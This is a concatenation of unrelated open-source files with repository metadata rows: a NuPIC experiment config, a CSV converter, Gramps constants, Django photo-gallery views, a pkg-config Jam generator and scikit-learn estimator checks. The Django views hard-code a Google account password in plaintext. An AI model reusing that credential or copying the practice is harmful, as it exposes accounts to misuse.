'type': 'ScalarEncoder',
'w': 21},
},
# A dictionary specifying the period for automatically-generated
# resets from a RecordSensor;
#
# None = disable automatically-generated resets (also disabled if
# all of the specified values evaluate to 0).
# Valid keys is the desired combination of the following:
# days, hours, minutes, seconds, milliseconds, microseconds, weeks
#
# Example for 1.5 days: sensorAutoReset = dict(days=1,hours=12),
#
# (value generated from SENSOR_AUTO_RESET)
'sensorAutoReset' : None,
},
'spEnable': True,
'spParams': {
# Spatial pooler implementation to use.
# Options: "py" (slow, good for debugging), and "cpp" (optimized).
'spatialImp': 'cpp',
# SP diagnostic output verbosity control;
# 0: silent; >=1: some info; >=2: more info;
'spVerbosity' : 0,
'globalInhibition': 1,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
'inputWidth': 0,
# SP inhibition control (absolute value);
# Maximum number of active columns in the SP region's output (when
# there are more, the weaker ones are suppressed)
'numActiveColumnsPerInhArea': 40,
'seed': 1956,
# potentialPct
# What percent of the columns's receptive field is available
# for potential synapses.
'potentialPct': 0.8,
# The default connected threshold. Any synapse whose
# permanence value is above the connected threshold is
# a "connected synapse", meaning it can contribute to the
# cell's firing. Typical value is 0.10. Cells whose activity
# level before inhibition falls below minDutyCycleBeforeInh
# will have their own internal synPermConnectedCell
# threshold set below this default value.
# (This concept applies to both SP and TP and so 'cells'
# is correct here as opposed to 'columns')
'synPermConnected': 0.1,
'synPermActiveInc': 0.05,
'synPermInactiveDec': 0.0005,
'maxBoost': 2.0
},
# Controls whether TP is enabled or disabled;
# TP is necessary for making temporal predictions, such as predicting
# the next inputs. Without TP, the model is only capable of
# reconstructing missing sensor inputs (via SP).
'tpEnable' : True,
'tpParams': {
# TP diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
# (see verbosity in nupic/trunk/py/nupic/research/TP.py and TP10X*.py)
'verbosity': 0,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
# The number of cells (i.e., states), allocated per column.
'cellsPerColumn': 32,
'inputWidth': 2048,
'seed': 1960,
# Temporal Pooler implementation selector (see _getTPClass in
# CLARegion.py).
'temporalImp': 'cpp',
# New Synapse formation count
# NOTE: If None, use spNumActivePerInhArea
'newSynapseCount': 20,
# Maximum number of synapses per segment
'maxSynapsesPerSegment': 32,
# Maximum number of segments per cell
'maxSegmentsPerCell': 128,
# Initial Permanence
'initialPerm': 0.21,
# Permanence Increment
'permanenceInc': 0.1,
# Permanence Decrement
# If set to None, will automatically default to tpPermanenceInc
# value.
'permanenceDec' : 0.1,
'globalDecay': 0.0,
'maxAge': 0,
# Minimum number of active synapses for a segment to be considered
# during search for the best-matching segments.
# None=use default
# Replaces: tpMinThreshold
'minThreshold': 12,
# Segment activation threshold.
# A segment is active if it has >= tpSegmentActivationThreshold
# connected synapses that are active due to infActiveState
# None=use default
# Replaces: tpActivationThreshold
'activationThreshold': 16,
'outputType': 'normal',
# "Pay Attention Mode" length. This tells the TP how many new
# elements to append to the end of a learned sequence at a time.
# Smaller values are better for datasets with short sequences,
# higher values are better for datasets with long sequences.
'pamLength': 1,
},
'clParams': {
'regionName' : 'CLAClassifierRegion',
# Classifier diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
'clVerbosity' : 0,
# This controls how fast the classifier learns/forgets. Higher values
# make it adapt faster and forget older patterns faster.
'alpha': 0.001,
# This is set after the call to updateConfigFromSubConfig and is
# computed from the aggregationInfo and predictAheadTime.
'steps': '1',
},
'anomalyParams': { u'anomalyCacheRecords': None,
u'autoDetectThreshold': None,
u'autoDetectWaitRecords': None},
'trainSPNetOnlyIfRequested': False,
},
}
# end of config dictionary
# Adjust base config dictionary for any modifications if imported from a
# sub-experiment
updateConfigFromSubConfig(config)
# Compute predictionSteps based on the predictAheadTime and the aggregation
# period, which may be permuted over.
if config['predictAheadTime'] is not None:
predictionSteps = int(round(aggregationDivide(
config['predictAheadTime'], config['aggregationInfo'])))
assert (predictionSteps >= 1)
config['modelParams']['clParams']['steps'] = str(predictionSteps)
# Adjust config by applying ValueGetterBase-derived
# futures. NOTE: this MUST be called after updateConfigFromSubConfig() in order
# to support value-getter-based substitutions from the sub-experiment (if any)
applyValueGettersToContainer(config)
control = {
# The environment that the current model is being run in
"environment": 'nupic',
# Input stream specification per py/nupic/frameworks/opf/jsonschema/stream_def.json.
#
'dataset' : { u'info': u'sine',
u'streams': [ { u'columns': [u'*'],
u'info': u'sine.csv',
u'last_record': 1800,
u'source': u'file://data/sine.csv'}],
u'version': 1},
# Iteration count: maximum number of iterations. Each iteration corresponds
# to one record from the (possibly aggregated) dataset. The task is
# terminated when either number of iterations reaches iterationCount or
# all records in the (possibly aggregated) database have been processed,
# whichever occurs first.
#
# iterationCount of -1 = iterate over the entire dataset
'iterationCount' : 4000,
# A dictionary containing all the supplementary parameters for inference
"inferenceArgs":{u'inputPredictedField': 'auto',
u'predictedField': u'data',
u'predictionSteps': [1]},
# Metrics: A list of MetricSpecs that instantiate the metrics that are
# computed for this experiment
'metrics':[
MetricSpec(field=u'data', metric='multiStep', inferenceElement='multiStepBestPredictions', params={'window': 1800, 'steps': [1], 'errorMetric': 'aae'}),
MetricSpec(field=u'data', metric='multiStep', inferenceElement='multiStepBestPredictions', params={'window': 1800, 'steps': [1], 'errorMetric': 'nrmse'})
],
# Logged Metrics: A sequence of regular expressions that specify which of
# the metrics from the Inference Specifications section MUST be logged for
# every prediction. The regex's correspond to the automatically generated
# metric labels. This is similar to the way the optimization metric is
# specified in permutations.py.
'loggedMetrics': ['.*'],
}
descriptionInterface = ExperimentDescriptionAPI(modelConfig=config,
control=control)
| gpl-3.0 | -6,689,820,296,016,079,000 | 35.293103 | 157 | 0.611876 | false |
mcxiaoke/python-labs | scripts/youqian2toshl.py | 1 | 1237 | #!/bin/env python3
import csv
import sys
from datetime import datetime
rows = []
with open(sys.argv[1]) as f:
fc = csv.reader(f)
headers = next(fc)
for r in fc:
di = datetime.strptime(r[0], '%Y-%m-%d')
r_date = datetime.strftime(di, '%m/%d/%y')
r_account = '现金'
r_cate = r[3]
if r_cate == '零食烟酒':
r_cate = '零食'
r_tag = ''
r_out = r[5]
r_in = '0'
r_type = 'CNY'
r_out2 = r[5]
r_type2 = 'CNY'
r_comment = r[4] + ' - '+r[7]
new_row = (r_date, r_account, r_cate, r_tag, r_out,
r_in, r_type, r_out2, r_type2, r_comment)
# print(r)
print(new_row)
rows.append(new_row)
# "日期","账户","类别","标签","支出金额","收入金额","货币","以主要货币","主要货币","说明"
# ('08/13/20', '现金', '零食', '', '35.50', '0', 'CNY', '35.50', 'CNY', '饮料 - 超市买纯净水M')
with open('to.csv', 'w') as f:
fc = csv.writer(f)
fc.writerow(('日期', '账户', '类别', '标签', '支出金额',
'收入金额', '货币', '以主要货币', '主要货币', '说明'))
for r in rows:
fc.writerow(r)
| apache-2.0 | -8,167,431,639,492,582,000 | 27.447368 | 83 | 0.454209 | false |
sam-m888/gprime | gprime/plugins/lib/libgrampsxml.py | 1 | 1440 | # gPrime - A web-based genealogy program
#
# Copyright (C) 2009 Brian G. Matherly
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#------------------------------------------------------------------------
#
# python modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# Gprime modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# Public Constants
#
#------------------------------------------------------------------------
GRAMPS_XML_VERSION_TUPLE = (1, 7, 1) # version for Gramps 4.2
GRAMPS_XML_VERSION = '.'.join(str(i) for i in GRAMPS_XML_VERSION_TUPLE)
| gpl-2.0 | -4,108,599,244,960,862,700 | 37.918919 | 79 | 0.511111 | false |
rivelo/portal | gallery/views.py | 1 | 4808 | # -*- coding: utf-8 -*-
from django.http import HttpResponse
#from django.shortcuts import render_to_response
from django.shortcuts import render, redirect
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpRequest, HttpResponseNotFound
from django.conf import settings
from portal.event_calendar.views import embeded_calendar
from portal.funnies.views import get_funn
from models import Album, Photo
import gdata.photos.service
import gdata.media
import gdata.geo
def custom_proc(request):
# "A context processor that provides 'app', 'user' and 'ip_address'."
return {
'app': 'Rivelo catalog',
'user': request.user,
'ip_address': request.META['REMOTE_ADDR']
}
def get_album():
list = []
album_list = []
gd_client = gdata.photos.service.PhotosService()
gd_client.email = "[email protected]"
gd_client.password = "gvelovelo"
gd_client.source = 'velorivne_albums'
gd_client.ProgrammaticLogin()
username = "[email protected]"
albums = gd_client.GetUserFeed(user=username)
for album in albums.entry:
print 'title: %s, number of photos: %s, id: %s' % (album.title.text, album.numphotos.text, album.gphoto_id.text)
album_list.append(album.title.text)
photos = gd_client.GetFeed('/data/feed/api/user/%s/albumid/%s?kind=photo' % (username, album.gphoto_id.text))
for photo in photos.entry:
print 'Photo title:', photo.title.text
list.append(photo.content.src)
return list, album_list
def albums_page(request):
photo1 = Photo.objects.random()
photo2 = Photo.objects.random()
albums = Album.objects.all()
vars = {'weblink': 'photo.html', 'sel_menu': 'photo', 'photo1': photo1, 'photo2': photo2, 'albums': albums, 'entry': get_funn()}
calendar = embeded_calendar()
vars.update(calendar)
return render(request, 'index.html', vars)
#return render_to_response('index.html', vars, context_instance=RequestContext(request, processors=[custom_proc]))
def album_page(request, id):
photo1 = Photo.objects.random()
photo2 = Photo.objects.random()
album = Album.objects.get(album_id=id)
album_name = album.title + " - " + str(album.numphotos) + " фото"
photos = Photo.objects.filter(album = album)
vars = {'weblink': 'photo_album.html', 'sel_menu': 'photo', 'photo1': photo1, 'photo2': photo2, 'album_name': album_name, 'photos': photos, 'entry': get_funn()}
calendar = embeded_calendar()
vars.update(calendar)
#return render_to_response('index.html', vars, context_instance=RequestContext(request, processors=[custom_proc]))
return render(request, 'index.html', vars)
def gallery_page(request):
photo1 = Photo.objects.random()
photo2 = Photo.objects.random()
# p_list, albums = get_album()
albums = Album.objects.all()
p_list = Photo.objects.filter(album = albums[3])
vars = {'weblink': 'photo.html', 'sel_menu': 'photo', 'photo_list': p_list[:10], 'photo1': photo1, 'photo2': photo2, 'albums': albums}
calendar = embeded_calendar()
vars.update(calendar)
#p_list = p_list[:10]
# return render_to_response('index.html', {'weblink': 'photo.html', 'sel_menu': 'photo', 'photo_list': p_list[:10], 'albums': albums}, context_instance=RequestContext(request, processors=[custom_proc]))
#return render_to_response('index.html', vars, context_instance=RequestContext(request, processors=[custom_proc]))
return render(request, 'index.html', vars)
def create_db(request):
username = '[email protected]'
gd_client = gdata.photos.service.PhotosService()
albums = gd_client.GetUserFeed(user=username)
for album in albums.entry:
print 'title: %s, number of photos: %s, id: %s' % (album.title.text, album.numphotos.text, album.gphoto_id.text)
try:
alb = Album(title=album.title.text, url=album.GetHtmlLink().href, numphotos=album.numphotos.text, album_id=album.gphoto_id.text)
alb.save()
except:
# do not duplicate albums
pass
photos = gd_client.GetFeed('/data/feed/api/user/%s/albumid/%s?kind=photo' % (username, album.gphoto_id.text))
for photo in photos.entry:
print 'Photo title:', photo.title.text
try:
p = Photo(album=alb, title=photo.title.text, image=photo.media.thumbnail[2].url, url=photo.content.src, pub_date=photo.timestamp.datetime(), filename=photo.media.title.text, photo_id=photo.gphoto_id.text, height=int(photos.entry[0].height.text), width=int(photos.entry[0].width.text))
p.save()
except:
# do not duplicate albums
pass
return HttpResponse("Дані додано")
| gpl-2.0 | 6,949,792,971,498,934,000 | 43.388889 | 300 | 0.664581 | false |
vmrob/needy | needy/generators/pkgconfig_jam.py | 1 | 6825 | from ..generator import Generator
import logging
import os
import subprocess
import textwrap
import hashlib
class PkgConfigJamGenerator(Generator):
@staticmethod
def identifier():
return 'pkgconfig-jam'
def generate(self, needy):
path = os.path.join(needy.needs_directory(), 'pkgconfig.jam')
env = os.environ.copy()
env['PKG_CONFIG_LIBDIR'] = ''
packages, broken_package_names = self.__get_pkgconfig_packages(env=env)
owned_packages = self.__get_owned_packages(needy, packages)
if broken_package_names:
logging.warn('broken packages found: {}'.format(' '.join(broken_package_names)))
contents = self.__get_header(self.__escape(env.get('PKG_CONFIG_PATH', '')))
contents += self.__get_path_targets(needy, packages)
contents += self.__get_pkg_targets(needy, packages)
contents += self.__get_pkgconfig_rules(needy, packages, owned_packages, broken_package_names)
with open(path, 'w') as f:
f.write(contents)
@classmethod
def __get_pkgconfig_packages(cls, env):
packages = []
broken_package_names = []
package_names = [line.split()[0] for line in subprocess.check_output(['pkg-config', '--list-all'], env=env).decode().splitlines()]
for package in package_names:
try:
pkg = {}
pkg['name'] = package
pkg['location'] = os.path.realpath(subprocess.check_output(['pkg-config', package, '--variable=pcfiledir'], env=env).decode().strip())
pkg['cflags'] = subprocess.check_output(['pkg-config', package, '--cflags'], env=env).decode().strip()
pkg['ldflags'] = subprocess.check_output(['pkg-config', package, '--libs', '--static'], env=env).decode().strip()
packages.append(pkg)
except subprocess.CalledProcessError:
broken_package_names.append(package)
continue
return packages, broken_package_names
@classmethod
def __get_owned_packages(cls, needy, packages):
owned_packages = []
for package in packages:
if not os.path.relpath(package['location'], os.path.realpath(needy.needs_directory())).startswith('..'):
owned_packages.append(package)
return owned_packages
@classmethod
def __get_header(cls, pkg_config_path):
return textwrap.dedent('''\
INSTALL_PREFIX = [ option.get prefix : "/usr/local" ] ;
PKG_CONFIG_PATH = "{pkg_config_path}" ;
import notfile ;
import project ;
local p = [ project.current ] ;
''').format(
pkg_config_path=pkg_config_path
)
@classmethod
def __get_path_targets(cls, needy, packages):
lines = ''
paths = set([os.path.abspath(os.path.join(p['location'], '..', '..')) for p in packages])
for path in paths:
path_hash = hashlib.sha256(path.encode('utf-8')).hexdigest().lower()
# This is the worst. Specifically, Boost Build is the worst. Their semaphore
# targets appear to be entirely broken (in addition to factually incorrect
# documentation) and so we have to write our own semaphore to ensure that
# this sort of file copying to $(INSTALL_PREFIX) occurs atomically.
#
# The reason this is necessary at all is due to a race condition in
# cp/mkdir of the destination path that errors on duplicate
# files/directories even in the presence of the -p flag.
lines += textwrap.dedent('''\
actions copy-path-{path_hash}-action {{
set -e ; trap "{{ rmdir $(INSTALL_PREFIX)/needy-copy-path.lock 2>/dev/null || true ; }}" EXIT TERM INT
mkdir -p $(INSTALL_PREFIX) && test -d $(INSTALL_PREFIX) && test -w $(INSTALL_PREFIX)
until mkdir -p $(INSTALL_PREFIX)/needy-copy-path.lock 2>/dev/null ; do python -c "import time;time.sleep(0.1)" ; done
cp -pR {path}/* $(INSTALL_PREFIX)/
}}
notfile.notfile copy-path-{path_hash} : @$(__name__).copy-path-{path_hash}-action ;
$(p).mark-target-as-explicit copy-path-{path_hash} ;
''').format(path_hash=path_hash, path=path)
return lines
@classmethod
def __get_pkg_targets(cls, needy, packages):
lines = ''
for package in packages:
path = os.path.abspath(os.path.join(package['location'], '..', '..'))
path_hash = hashlib.sha256(path.encode('utf-8')).hexdigest().lower()
lines += 'alias {}-package : : : : <cflags>"{}" <linkflags>"{}" ;\n'.format(package['name'], PkgConfigJamGenerator.__escape(package['cflags']), PkgConfigJamGenerator.__escape(package['ldflags']))
lines += textwrap.dedent('''\
alias install-{package}-package : copy-path-{path_hash} ;
''').format(package=package['name'], path_hash=path_hash)
if not os.path.relpath(package['location'], os.path.realpath(needy.needs_directory())).startswith('..'):
lines += 'alias install-{package}-package-if-owned : install-{package}-package ;\n'.format(package=package['name'])
else:
lines += 'alias install-{package}-package-if-owned ;\n'.format(package=package['name'])
lines += textwrap.dedent('''\
$(p).mark-target-as-explicit install-{package}-package install-{package}-package-if-owned ;
''').format(package=package['name'])
return lines
@classmethod
def __get_pkgconfig_rules(cls, needy, packages, owned_packages, broken_package_names):
return textwrap.dedent('''\
PKG_CONFIG_PACKAGES = {pkg_config_packages} ;
OWNED_PKG_CONFIG_PACKAGES = {owned_pkg_config_packages} ;
rule dependency ( name : packages * ) {{
if ! $(packages) {{
packages = $(name) ;
}}
if $(packages) in $(PKG_CONFIG_PACKAGES) {{
alias $(name) : $(packages)-package ;
alias install-$(name)-if-owned : install-$(packages)-package-if-owned ;
local p = [ project.current ] ;
$(p).mark-target-as-explicit install-$(name)-if-owned ;
}}
}}
''').format(
pkg_config_packages=' '.join([package['name'] for package in packages if package['name'] not in broken_package_names]),
owned_pkg_config_packages=' '.join([p['name'] for p in owned_packages])
)
@classmethod
def __escape(cls, s):
return s.replace('\\', '\\\\').replace('"', '\\"')
| mit | 410,549,216,565,586,900 | 44.5 | 207 | 0.572161 | false |
0asa/scikit-learn | sklearn/utils/estimator_checks.py | 1 | 37529 | from __future__ import print_function
import warnings
import sys
import traceback
import inspect
import pickle
import numpy as np
from scipy import sparse
import struct
from sklearn.externals.six.moves import zip
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import META_ESTIMATORS
from sklearn.utils.testing import set_random_state
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import SkipTest
from sklearn.utils.testing import check_skip_travis
from sklearn.base import (clone, ClusterMixin, ClassifierMixin)
from sklearn.metrics import accuracy_score, adjusted_rand_score, f1_score
from sklearn.lda import LDA
from sklearn.random_projection import BaseRandomProjection
from sklearn.feature_selection import SelectKBest
from sklearn.svm.base import BaseLibSVM
from sklearn.utils.validation import DataConversionWarning, NotFittedError
from sklearn.cross_validation import train_test_split
from sklearn.utils import shuffle
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import load_iris, load_boston, make_blobs
BOSTON = None
CROSS_DECOMPOSITION = ['PLSCanonical', 'PLSRegression', 'CCA', 'PLSSVD']
def _boston_subset(n_samples=200):
global BOSTON
if BOSTON is None:
boston = load_boston()
X, y = boston.data, boston.target
X, y = shuffle(X, y, random_state=0)
X, y = X[:n_samples], y[:n_samples]
X = StandardScaler().fit_transform(X)
BOSTON = X, y
return BOSTON
def set_fast_parameters(estimator):
# speed up some estimators
params = estimator.get_params()
if "n_iter" in params:
estimator.set_params(n_iter=5)
if "max_iter" in params:
# NMF
if estimator.max_iter is not None:
estimator.set_params(max_iter=min(5, estimator.max_iter))
# LinearSVR
if estimator.__class__.__name__ == 'LinearSVR':
estimator.set_params(max_iter=20)
if "n_resampling" in params:
# randomized lasso
estimator.set_params(n_resampling=5)
if "n_estimators" in params:
# especially gradient boosting with default 100
estimator.set_params(n_estimators=min(5, estimator.n_estimators))
if "max_trials" in params:
# RANSAC
estimator.set_params(max_trials=10)
if "n_init" in params:
# K-Means
estimator.set_params(n_init=2)
if isinstance(estimator, BaseRandomProjection):
# Due to the jl lemma and often very few samples, the number
# of components of the random matrix projection will be probably
# greater than the number of features.
# So we impose a smaller number (avoid "auto" mode)
estimator.set_params(n_components=1)
if isinstance(estimator, SelectKBest):
# SelectKBest has a default of k=10
# which is more feature than we have in most case.
estimator.set_params(k=1)
class NotAnArray(object):
" An object that is convertable to an array"
def __init__(self, data):
self.data = data
def __array__(self, dtype=None):
return self.data
def _is_32bit():
"""Detect if process is 32bit Python."""
return struct.calcsize('P') * 8 == 32
def check_regressors_classifiers_sparse_data(name, Estimator):
rng = np.random.RandomState(0)
X = rng.rand(40, 10)
X[X < .8] = 0
X = sparse.csr_matrix(X)
y = (4 * rng.rand(40)).astype(np.int)
# catch deprecation warnings
with warnings.catch_warnings():
estimator = Estimator()
set_fast_parameters(estimator)
# fit and predict
try:
estimator.fit(X, y)
estimator.predict(X)
if hasattr(estimator, 'predict_proba'):
estimator.predict_proba(X)
except TypeError as e:
if not 'sparse' in repr(e):
print("Estimator %s doesn't seem to fail gracefully on "
"sparse data: error message state explicitly that "
"sparse input is not supported if this is not the case."
% name)
raise
except Exception:
print("Estimator %s doesn't seem to fail gracefully on "
"sparse data: it should raise a TypeError if sparse input "
"is explicitly not supported." % name)
raise
def check_transformer(name, Transformer):
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X = StandardScaler().fit_transform(X)
X -= X.min()
_check_transformer(name, Transformer, X, y)
_check_transformer(name, Transformer, X.tolist(), y.tolist())
def check_transformer_data_not_an_array(name, Transformer):
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X = StandardScaler().fit_transform(X)
# We need to make sure that we have non negative data, for things
# like NMF
X -= X.min() - .1
this_X = NotAnArray(X)
this_y = NotAnArray(np.asarray(y))
_check_transformer(name, Transformer, this_X, this_y)
def check_transformers_unfitted(name, Transformer):
X, y = _boston_subset()
with warnings.catch_warnings(record=True):
transformer = Transformer()
assert_raises(NotFittedError, transformer.transform, X)
def _check_transformer(name, Transformer, X, y):
if name in ('CCA', 'LocallyLinearEmbedding', 'KernelPCA') and _is_32bit():
# Those transformers yield non-deterministic output when executed on
# a 32bit Python. The same transformers are stable on 64bit Python.
# FIXME: try to isolate a minimalistic reproduction case only depending
# on numpy & scipy and/or maybe generate a test dataset that does not
# cause such unstable behaviors.
msg = name + ' is non deterministic on 32bit Python'
raise SkipTest(msg)
n_samples, n_features = np.asarray(X).shape
# catch deprecation warnings
with warnings.catch_warnings(record=True):
transformer = Transformer()
set_random_state(transformer)
if name == "KernelPCA":
transformer.remove_zero_eig = False
set_fast_parameters(transformer)
# fit
if name in CROSS_DECOMPOSITION:
y_ = np.c_[y, y]
y_[::2, 1] *= 2
else:
y_ = y
transformer.fit(X, y_)
X_pred = transformer.fit_transform(X, y=y_)
if isinstance(X_pred, tuple):
for x_pred in X_pred:
assert_equal(x_pred.shape[0], n_samples)
else:
assert_equal(X_pred.shape[0], n_samples)
if hasattr(transformer, 'transform'):
if name in CROSS_DECOMPOSITION:
X_pred2 = transformer.transform(X, y_)
X_pred3 = transformer.fit_transform(X, y=y_)
else:
X_pred2 = transformer.transform(X)
X_pred3 = transformer.fit_transform(X, y=y_)
if isinstance(X_pred, tuple) and isinstance(X_pred2, tuple):
for x_pred, x_pred2, x_pred3 in zip(X_pred, X_pred2, X_pred3):
assert_array_almost_equal(
x_pred, x_pred2, 2,
"fit_transform and transform outcomes not consistent in %s"
% Transformer)
assert_array_almost_equal(
x_pred, x_pred3, 2,
"consecutive fit_transform outcomes not consistent in %s"
% Transformer)
else:
assert_array_almost_equal(
X_pred, X_pred2, 2,
"fit_transform and transform outcomes not consistent in %s"
% Transformer)
assert_array_almost_equal(
X_pred, X_pred3, 2,
"consecutive fit_transform outcomes not consistent in %s"
% Transformer)
# raises error on malformed input for transform
if hasattr(X, 'T'):
# If it's not an array, it does not have a 'T' property
assert_raises(ValueError, transformer.transform, X.T)
def check_transformer_sparse_data(name, Transformer):
rng = np.random.RandomState(0)
X = rng.rand(40, 10)
X[X < .8] = 0
X = sparse.csr_matrix(X)
y = (4 * rng.rand(40)).astype(np.int)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
if name in ['Scaler', 'StandardScaler']:
transformer = Transformer(with_mean=False)
else:
transformer = Transformer()
set_fast_parameters(transformer)
# fit
try:
transformer.fit(X, y)
except TypeError as e:
if not 'sparse' in repr(e):
print("Estimator %s doesn't seem to fail gracefully on "
"sparse data: error message state explicitly that "
"sparse input is not supported if this is not the case."
% name)
raise
except Exception:
print("Estimator %s doesn't seem to fail gracefully on "
"sparse data: it should raise a TypeError if sparse input "
"is explicitly not supported." % name)
raise
def check_estimators_nan_inf(name, Estimator):
rnd = np.random.RandomState(0)
X_train_finite = rnd.uniform(size=(10, 3))
X_train_nan = rnd.uniform(size=(10, 3))
X_train_nan[0, 0] = np.nan
X_train_inf = rnd.uniform(size=(10, 3))
X_train_inf[0, 0] = np.inf
y = np.ones(10)
y[:5] = 0
y = multioutput_estimator_convert_y_2d(name, y)
error_string_fit = "Estimator doesn't check for NaN and inf in fit."
error_string_predict = ("Estimator doesn't check for NaN and inf in"
" predict.")
error_string_transform = ("Estimator doesn't check for NaN and inf in"
" transform.")
for X_train in [X_train_nan, X_train_inf]:
# catch deprecation warnings
with warnings.catch_warnings(record=True):
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator, 1)
# try to fit
try:
if issubclass(Estimator, ClusterMixin):
estimator.fit(X_train)
else:
estimator.fit(X_train, y)
except ValueError as e:
if not 'inf' in repr(e) and not 'NaN' in repr(e):
print(error_string_fit, Estimator, e)
traceback.print_exc(file=sys.stdout)
raise e
except Exception as exc:
print(error_string_fit, Estimator, exc)
traceback.print_exc(file=sys.stdout)
raise exc
else:
raise AssertionError(error_string_fit, Estimator)
# actually fit
if issubclass(Estimator, ClusterMixin):
# All estimators except clustering algorithm
# support fitting with (optional) y
estimator.fit(X_train_finite)
else:
estimator.fit(X_train_finite, y)
# predict
if hasattr(estimator, "predict"):
try:
estimator.predict(X_train)
except ValueError as e:
if not 'inf' in repr(e) and not 'NaN' in repr(e):
print(error_string_predict, Estimator, e)
traceback.print_exc(file=sys.stdout)
raise e
except Exception as exc:
print(error_string_predict, Estimator, exc)
traceback.print_exc(file=sys.stdout)
else:
raise AssertionError(error_string_predict, Estimator)
# transform
if hasattr(estimator, "transform"):
try:
estimator.transform(X_train)
except ValueError as e:
if not 'inf' in repr(e) and not 'NaN' in repr(e):
print(error_string_transform, Estimator, e)
traceback.print_exc(file=sys.stdout)
raise e
except Exception as exc:
print(error_string_transform, Estimator, exc)
traceback.print_exc(file=sys.stdout)
else:
raise AssertionError(error_string_transform, Estimator)
def check_transformer_pickle(name, Transformer):
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
n_samples, n_features = X.shape
X = StandardScaler().fit_transform(X)
X -= X.min()
# catch deprecation warnings
with warnings.catch_warnings(record=True):
transformer = Transformer()
if not hasattr(transformer, 'transform'):
return
set_random_state(transformer)
set_fast_parameters(transformer)
# fit
if name in CROSS_DECOMPOSITION:
random_state = np.random.RandomState(seed=12345)
y_ = np.vstack([y, 2 * y + random_state.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
transformer.fit(X, y_)
X_pred = transformer.fit(X, y_).transform(X)
pickled_transformer = pickle.dumps(transformer)
unpickled_transformer = pickle.loads(pickled_transformer)
pickled_X_pred = unpickled_transformer.transform(X)
assert_array_almost_equal(pickled_X_pred, X_pred)
def check_estimators_partial_fit_n_features(name, Alg):
# check if number of features changes between calls to partial_fit.
if not hasattr(Alg, 'partial_fit'):
return
X, y = make_blobs(n_samples=50, random_state=1)
X -= X.min()
with warnings.catch_warnings(record=True):
alg = Alg()
set_fast_parameters(alg)
if isinstance(alg, ClassifierMixin):
classes = np.unique(y)
alg.partial_fit(X, y, classes=classes)
else:
alg.partial_fit(X, y)
assert_raises(ValueError, alg.partial_fit, X[:, :-1], y)
def check_clustering(name, Alg):
X, y = make_blobs(n_samples=50, random_state=1)
X, y = shuffle(X, y, random_state=7)
X = StandardScaler().fit_transform(X)
n_samples, n_features = X.shape
# catch deprecation and neighbors warnings
with warnings.catch_warnings(record=True):
alg = Alg()
set_fast_parameters(alg)
if hasattr(alg, "n_clusters"):
alg.set_params(n_clusters=3)
set_random_state(alg)
if name == 'AffinityPropagation':
alg.set_params(preference=-100)
alg.set_params(max_iter=100)
# fit
alg.fit(X)
# with lists
alg.fit(X.tolist())
assert_equal(alg.labels_.shape, (n_samples,))
pred = alg.labels_
assert_greater(adjusted_rand_score(pred, y), 0.4)
# fit another time with ``fit_predict`` and compare results
if name is 'SpectralClustering':
# there is no way to make Spectral clustering deterministic :(
return
set_random_state(alg)
with warnings.catch_warnings(record=True):
pred2 = alg.fit_predict(X)
assert_array_equal(pred, pred2)
def check_clusterer_compute_labels_predict(name, Clusterer):
"""Check that predict is invariant of compute_labels"""
X, y = make_blobs(n_samples=20, random_state=0)
clusterer = Clusterer()
if hasattr(clusterer, "compute_labels"):
# MiniBatchKMeans
if hasattr(clusterer, "random_state"):
clusterer.set_params(random_state=0)
X_pred1 = clusterer.fit(X).predict(X)
clusterer.set_params(compute_labels=False)
X_pred2 = clusterer.fit(X).predict(X)
assert_array_equal(X_pred1, X_pred2)
def check_classifiers_one_label(name, Classifier):
error_string_fit = "Classifier can't train when only one class is present."
error_string_predict = ("Classifier can't predict when only one class is "
"present.")
rnd = np.random.RandomState(0)
X_train = rnd.uniform(size=(10, 3))
X_test = rnd.uniform(size=(10, 3))
y = np.ones(10)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
set_fast_parameters(classifier)
# try to fit
try:
classifier.fit(X_train, y)
except ValueError as e:
if not 'class' in repr(e):
print(error_string_fit, Classifier, e)
traceback.print_exc(file=sys.stdout)
raise e
else:
return
except Exception as exc:
print(error_string_fit, Classifier, exc)
traceback.print_exc(file=sys.stdout)
raise exc
# predict
try:
assert_array_equal(classifier.predict(X_test), y)
except Exception as exc:
print(error_string_predict, Classifier, exc)
raise exc
def check_classifiers_train(name, Classifier):
X_m, y_m = make_blobs(random_state=0)
X_m, y_m = shuffle(X_m, y_m, random_state=7)
X_m = StandardScaler().fit_transform(X_m)
# generate binary problem from multi-class one
y_b = y_m[y_m != 2]
X_b = X_m[y_m != 2]
for (X, y) in [(X_m, y_m), (X_b, y_b)]:
# catch deprecation warnings
classes = np.unique(y)
